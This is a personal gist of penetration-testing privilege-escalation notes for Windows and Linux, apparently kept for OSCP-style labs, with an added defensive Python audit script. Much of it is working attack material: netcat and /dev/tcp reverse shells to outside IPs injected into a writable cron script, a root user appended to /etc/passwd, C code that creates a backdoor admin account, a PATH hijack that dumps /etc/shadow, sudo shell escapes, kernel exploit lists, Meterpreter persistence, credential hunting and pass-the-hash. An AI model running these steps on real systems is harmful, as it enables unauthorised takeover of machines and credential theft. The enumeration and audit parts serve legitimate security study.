@ssstonebraker
Last active January 21, 2022 07:47
Grep for files on disk

grep --binary-files=text -B 2 '99999:7' /dev/sda1
find / -maxdepth 2 -path '/proc' -prune -o -path '/dev' -prune -o -type f -exec grep "proof.txt" {} +

Docker Privilege Escalation

mkdir /tmp/mnt 2>/dev/null; docker run -v /:/tmp/mnt --rm -it alpine chroot /tmp/mnt sh

Linux - OS Info

offsec@core:/dev/shm$ uname -a
Linux core 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
offsec@core:/dev/shm$ uname -r
2.6.32-21-generic-pae

Privilege Escalation

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite


Linux Privilege Escalation

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Windows Privilege Escalation

https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html

Resources

Linux Binaries to Breakout with if you have Sudoers rights

https://gtfobins.github.io/
https://in.security/lin-security-walkthrough/

Other

https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html

Determine Operating System

Linux

student@debian:~$ cat /etc/issue
Debian GNU/Linux 9 \n \l
student@debian:~$ cat /etc/*-release
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
...
student@debian:~$ uname -a
Linux debian 4.9.0-6-686 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) i686 GNU/Linux

Check Global Path

Windows

If any directory in the system %PATH% is writable by Authenticated Users, privilege escalation is possible: many applications and services launch helper binaries without a full path, so a binary planted in that directory is what gets executed.

If system32 is not the first entry in the path, that is a bad sign as well.

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"

Enumerating Running Processes and Services

Windows

tasklist /SVC
wmic service where started=true get name, startname

Linux

$ ps aux

Enumerating Networking Information

Windows

ipconfig /all
route print
netstat -ano

Linux

IP Interface Information

# 'ip a' is short for 'ip address'; 'ifconfig -a' also lists interfaces that are down
ip a
ifconfig -a

Routes and ports

/sbin/route
ss -anp

Host Firewall

Windows

netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Linux


# list rules
iptables -L

# rule stored here
/etc/iptables

# binaries
iptables-save
iptables-restore

Use Sid

Scheduled Tasks

Windows

# Verbose argument /v
schtasks /query /fo LIST
schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskNam
schtasks /query /v /fo list /tn "\System Maintenance"

Linux

# system administrators often add their own scheduled tasks in /etc/crontab or /etc/cron.d

/etc/crontab
/etc/cron.d/*
/etc/cron.daily

Enumerating Installed Applications and Patch Levels

Windows

wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn

Linux

# Debian
dpkg -l

Enumerating Readable/Writable Files and Directories

Windows

c:\Tools\privilege_escalation\SysinternalsSuite>accesschk.exe -uws "Everyone" "C:\Program Files"

Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

Linux

# World writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o=w -type d 2>/dev/null

# World executable directories
find / -perm -o=x -type d 2>/dev/null

# World writable and executable directories
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null

Enumerating Unmounted Disks

Windows

mountvol

mountvol c:\test \\?\Volume{93131ba8-0000-0000-0000-100000000000}\

Linux

cat /etc/fstab
mount
/bin/lsblk

Enumerating Device Drivers and Kernel Modules

Windows

powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Linux

lsmod
/sbin/modinfo libata

Enumerating Binaries That AutoElevate

Windows

If AlwaysInstallElevated is set to 1 under both of these keys, any MSI package installs with SYSTEM privileges

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Linux

Search for SUID files

#  For example, if /bin/cp (the copy command) were SUID, we could copy and overwrite sensitive files such as /etc/passwd.

find / -perm -u=s -type f 2>/dev/null

Windows Other

patch level

systeminfo  
wmic qfe get Caption,Description,HotFixID,InstalledOn  

whoami  
echo %USERNAME%  

Users and Groups

net user  
net localgroup  

users in a domain  
net user /domain  

net group /domain  
net group /domain <Group Name>  

Firewall

netsh firewall show state  
netsh firewall show config  

Network

ipconfig /all  
route print  
arp -a  

Scheduled Tasks

schtasks /query /fo LIST /v  
-- copy the output into schtask.txt on your own machine, then:  
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM  

dir %SystemRoot%\Tasks  

e.g. c:\windows\tasks\  
e.g. c:\windows\system32\tasks\  

Weak Service Permissions

Check whether the service configuration can be modified

accesschk.exe /accepteula  
accesschk.exe -uwcqv "Authenticated Users" * /accepteula  
accesschk.exe -ucqv <Service Name>  

sc qc <Service Name> -- Get service details  

Check for services whose binary has weak file permissions

Uses c:\windows\temp\ as scratch space  

wmic.exe  
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"  

sc.exe  
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt  
FOR /F %i in (Servicenames.txt) DO echo %i  
type Servicenames.txt  
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt  
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt  

Check running services for custom installed services

These may run as SYSTEM and have overwritable .exe files

Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"
Serviio                Running C:\Program Files\Serviio\bin\ServiioService.exe

Check permissions on service exe file

PS C:\Users\offsec.CLIENT251> icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
                                                NT AUTHORITY\SYSTEM:(I)(F)
                                                BUILTIN\Administrators:(I)(F)
                                                APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Unquoted service paths

# drop Windows services and any path that is already quoted; what remains with spaces in the path is a candidate
wmic service get name,displayname,pathname,startmode | findstr /i /v Windows | findstr /v """

Passwords in files

https://pentestlab.blog/tag/privilege-escalation/page/3/
cmdkey /list    -- If this lists entries, a user has stored credentials in Windows and runas /savecred may run commands as that user
runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \IP\share\nc.exe -nv 10.10.14.2 80 -e cmd.exe"

Can we find any SAM files?

%SYSTEMROOT%\repair\SAM  
%SYSTEMROOT%\System32\config\RegBack\SAM  
%SYSTEMROOT%\System32\config\SAM  
%SYSTEMROOT%\repair\system  
%SYSTEMROOT%\System32\config\SYSTEM  
%SYSTEMROOT%\System32\config\RegBack\system  

findstr /si password *.txt  
findstr /si password *.xml  
findstr /si password *.ini  
findstr /si pass/pwd *.ini  

dir /s *pass* == *cred* == *vnc* == *.config*  

in all files  
findstr /spin "password" *.*  

Unattended? vnc?  
c:\sysprep.inf  
c:\sysprep\sysprep.xml  
c:\unattend.xml  
%WINDIR%\Panther\Unattend\Unattended.xml  
%WINDIR%\Panther\Unattended.xml  

dir /b /s unattend.xml  
dir /b /s web.config  
dir /b /s sysprep.inf  
dir /b /s sysprep.xml  
dir /b /s *pass*  

dir c:\*vnc.ini /s /b  
dir c:\*ultravnc.ini /s /b   
dir c:\ /s /b | findstr /si *vnc.ini  

Windows Registry Queries

VNC

reg query "HKCU\Software\ORL\WinVNC3\Password"  
reg query "HKCU\Software\TightVNC\Server"  

Windows autologin

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"  

SNMP Parameters

reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"  

Putty

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"  

Search for password in registry

reg query HKLM /f password /t REG_SZ /s  
reg query HKCU /f password /t REG_SZ /s  

AlwaysInstallElevated -- from a 32-bit shell on 64-bit Windows use %SystemRoot%\Sysnative\reg.exe

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated  
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated  

Directory Permissions

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Power Users" * /accepteula
icacls scsiaccess.exe	-Check permissions on the file (look for the W or F flag) and substitute the binary if possible

Registry Key permissions

subinacl /keyreg HKEY_LOCAL_MACHINE\software\microsoft

Exe to add user to server

Write and compile malicious exe file to add a user to the system as an admin

Contents of adduser.c

#include <stdlib.h>

int main(void)
{
    int i;

    /* Creates a local user and adds it to the Administrators group */
    i = system("net user evil Ev!lpass /add");
    i = system("net localgroup administrators evil /add");

    return 0;
}

Compile adduser.c on kali

sudo i686-w64-mingw32-gcc adduser.c -o adduser.exe

Get state and start mode of service

wmic service where caption="Serviio" get name, caption, state, startmode

Check who is a member of the local group "Administrators"

net localgroup Administrators

Special Permissions

Windows

Linux

SetUID

SUID is a special file permission on executable files that lets other users run the file with the effective permissions of the file owner. Instead of the usual x (execute) in the owner position you will see an s, which indicates SUID.

find / -perm /4000

SetGID

SGID is a special file permission that also applies to executable files and lets other users inherit the effective GID of the file's group owner. Likewise, instead of the usual x in the group position you will see an s, which indicates SGID.

find / -perm /2000

Files with SetUID or SetGID set

To find files with SUID or SGID set, run the commands below (-perm /6000 matches either bit; use -perm -6000 to require both).

find / -perm /6000 -exec ls -ldb {} \;
find / -perm /6000 -type f -exec ls -ldb {} \;
find / -perm /6000 -type f -exec ls -ldb {} \; | grep -v denied > t.txt

Find files with setuid or setgid bit set

# A setuid/setgid program with a vulnerability == privilege escalation
# Look for buffer overflows, format string vulns, insecure API usage, and logic flaws
# https://www.youtube.com/watch?v=yXe4X-AIbps&t=1668s
# 28:33
# The tests are grouped with \( \) because -a binds tighter than -o; without the
# parentheses the -exec would only apply to the -perm -2000 branch
find / \( -perm -4000 -o -perm -2000 \) -exec ls -ldb {} \;
find / \( -perm -4000 -o -perm -2000 \) -exec ls -ldb {} \; | grep -v denied > a.txt
find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -ldb {} \; | grep -v denied > a.txt

# use ltrace to see what the program executes

# If a program doesn't use a full path, putting the current directory first in PATH makes it run a program of yours instead
export PATH=.:$PATH

# Example: the /bin/checkHost command doesn't use a full path for grep

#!/bin/dash
# save as ./grep
# chmod 755 ./grep
cat /etc/shadow

Find Scripts we can write to

# find files we can write to that are not symbolic links
find / -perm -2 ! -type l -ls 2>/dev/null

# find scripts we can write to that are not symbolic links
find / -perm -2 ! -type l -ls 2>/dev/null | grep sh
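As an added example (not part of the gist), the following Python script does the work of the setuid/setgid and writable-file finds above in one pass and diffs the result against a saved baseline, which is how a defender turns these checks into a detection: a setuid binary or a root-owned script that is world-writable today but was not yesterday is the thing to investigate. The skip list is an assumption.

```python
import os
import stat
from typing import Dict, Iterable, Tuple

# Pseudo-filesystems that only add noise or stall a walk (assumed skip list).
DEFAULT_SKIP = ("/proc", "/sys", "/dev", "/run")

def classify(mode: int) -> str:
    """Tags for an st_mode, joined by '+': 'suid', 'sgid', 'world-writable'.
    Mirrors the find tests -perm -4000, -perm -2000 and -perm -2."""
    tags = []
    if mode & stat.S_ISUID:
        tags.append("suid")
    if mode & stat.S_ISGID:
        tags.append("sgid")
    if mode & stat.S_IWOTH:
        tags.append("world-writable")
    return "+".join(tags)

def _under(path: str, prefixes: Tuple[str, ...]) -> bool:
    return any(path == p or path.startswith(p + os.sep) for p in prefixes)

def scan(root: str, skip: Iterable[str] = DEFAULT_SKIP) -> Dict[str, Tuple[str, int]]:
    """Map path -> (tags, permission bits) for each flagged regular file.
    Symlinks are not followed and unreadable paths are skipped, like
    'find / ... ! -type l 2>/dev/null'."""
    skip = tuple(os.path.abspath(s) for s in skip)
    found = {}
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        # Prune in place so os.walk never descends into the skipped trees.
        dirnames[:] = [d for d in dirnames if not _under(os.path.join(dirpath, d), skip)]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and classify(st.st_mode):
                found[path] = (classify(st.st_mode), stat.S_IMODE(st.st_mode))
    return found

def diff_baseline(current: Dict[str, Tuple[str, int]],
                  baseline: Dict[str, Tuple[str, int]]):
    """Return (entries new or changed since baseline, entries that vanished).
    A new setuid binary, or a root-owned script that became world-writable,
    is exactly what a responder wants surfaced."""
    changed = {p: v for p, v in current.items() if baseline.get(p) != v}
    gone = {p: v for p, v in baseline.items() if p not in current}
    return changed, gone

if __name__ == "__main__":  # usage: python3 audit_special.py [root]
    import sys
    for path, (tags, mode) in sorted(scan(sys.argv[1] if len(sys.argv) > 1 else "/").items()):
        print(f"{mode:04o} {tags:25} {path}")
```

Save the output of scan() from a known-good build as the baseline and run diff_baseline() on a schedule; for the cron case below, the script path in /var/scripts showing up as world-writable is the finding.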

student@debian:~$ stat /var/scripts/user_backups.sh
  File: /var/scripts/user_backups.sh
  Size: 57        	Blocks: 8          IO Block: 4096   regular file
Device: 801h/2049d	Inode: 7606        Links: 1
Access: (0777/-rwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2020-04-08 06:40:01.163998782 -0400
Modify: 2020-03-10 05:59:52.931997540 -0400
Change: 2020-03-10 05:59:52.931997540 -0400
 Birth: -

Linux Other

Elevate if a script run by crontab is writable

This assumes "user_backups.sh" is writable:

student@debian:/var/scripts$ echo >> user_backups.sh
student@debian:/var/scripts$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.152 1234 >/tmp/f" >> user_backups.sh
student@debian:/var/scripts$ cat user_backups.sh
#!/bin/bash

cp -rf /home/student/ /var/backups/student/

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.152 1234 >/tmp/f

From your attacking host run this and wait for cron to execute:

nc -nlv 1234

Elevate if /etc/passwd is writable

student@debian:~$ openssl passwd password
YrnMnsTH1xTMg
student@debian:~$ echo "root2:YrnMnsTH1xTMg:0:0:root:/root:/bin/bash" >> /etc/passwd
student@debian:~$ su root2
# Password: password
root@debian:/home/student#

Find recent files:

find -mtime 0	-find files modified less than 24 hours ago
touch --date "2013-01-01" /tmp/timestamp
find /var/log -type f -newer /tmp/timestamp

Linux Other

cat /etc/crontab
ls -la /lib/systemd/system/debug.service (https://in.security/lin-security-walkthrough/)
find / -perm -2 ! -type l -ls 2>/dev/null	-Look for cron scripts, if any
find / -perm -4000 -o -perm -2000 -exec ls -ldb {} \;
find / -perm -6000
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
find / -user flag00 2>/dev/null		-Files owned by user flag00
find /var/www/html -type d -perm -o+w	-Find world-writable dirs
find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null



	sudo -l		-Allowed to run
		LESS, XXD, STRACE, TASKSET (https://gtfobins.github.io/)
		SOCAT:
			Bind shell: sudo socat TCP-LISTEN:9999,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
			To connect: socat FILE:`tty`,raw,echo=0 TCP:192.168.114.142:9999

		ssh--> sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
		vi-->	:!bash
		vi-->	:set shell=/bin/bash:shell
		awk (also works for mawk)--> awk 'BEGIN {system("/bin/bash")}'
		find-->	find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
		perl-->	perl -e 'exec "/bin/bash";'


	ls -ahlR /home/; ls -ahlR /root/

	/bin/bash -i >& /dev/tcp/10.11.0.76/443 0>&1	-Inject this reverse shell into cron script

	dirty (40839.c )	- Linux 2.6.32, 2.6.22 (Linux 2.6.22 - 3.9)	gcc -pthread 40839.c -o dirty -lcrypt
	linux2421		- Linux 2.4.7(crashed)
	9.0 (28718.c)		- FreeBSD 9.0
	centsos45 (9542.c)	- CentOS 4.4 - 4.5 (Linux 2.6 - 2.6.19)
	linux26 (5093.c)	- Linux (2.6.23 - 2.6.24)
	18411.c			- Linux 2.6.39 < 3.2.2 (Ubuntu 11.10, kernel 3.0.0-12)
	37292.c	(ubuntu)	- ubuntu 14.04 (Linux 3.13 - 3.19)

Windows Exploits

CVE-2020-0796 SMB3

https://github.com/danigargu/CVE-2020-0796

Other

	KiTrap0D (KB979682)	use exploit/windows/local/ms10_015_kitrap0d
	MS11-011 (KB2393802)
	MS10-059 (KB982799)	Churraskito.exe "C:\windows\system32\cmd.exe" "net user 123 123 /add"
	MS10-021 (KB979683) 	MS office
	MS11-080 (KB2592799)	megacorp/exploits/windows-kernel-exploits/MS11-080
	MS12-042 (KB2709715)


After escalation:

	run persistence -U -i 30 -p 443 -r 10.11.0.76

	net user pronto prontissimo /add
	net localgroup administrators pronto /add
	net localgroup "Remote Desktop Users" pronto /add

	C:\Windows\system32> dir /s *pass* == *cred* == *vnc* == *.config*
	C:\Windows\system32> findstr /si password *.xml *.ini *.txt
	C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s
	C:\Windows\system32> reg query HKCU /f password /t REG_SZ /s

	useradd -g 0 -s /bin/bash -m Tom	-Linux	(root group 0)
	usermod -aG sudo Tom
	adduser			-FreeBSD

Client side

MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution
	MS12-037 (24017 html file)	-Once run in IE8, listen on 4444; wget -O exploit.html https://www.exploit-db.com/exploits/24017

Check RID

wmic useraccount where (name='Guest') get name,sid

Automated Enumeration

Windows

c:\Tools\privilege_escalation\windows-privesc-check-master>windows-privesc-check2.exe --dump -G
windows-privesc-check v2.0 (http://pentestmonkey.net/windows-privesc-check)
[i] TSUserEnabled registry value is 0. Excluding TERMINAL SERVER USER
Considering these users to be trusted:
* BUILTIN\Power Users
* BUILTIN\Administrators
* NT SERVICE\TrustedInstaller
* NT AUTHORITY\SYSTEM

Linux

./unix-privesc-check standard > output.txt

student@debian:~$ ./unix-privesc-check
unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )
Usage: unix-privesc-check { standard | detailed }
"standard" mode: Speed-optimised check of lots of security settings.


Template

Windows

Linux



Pass the Hash

Use the NTLM hash to authenticate

pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd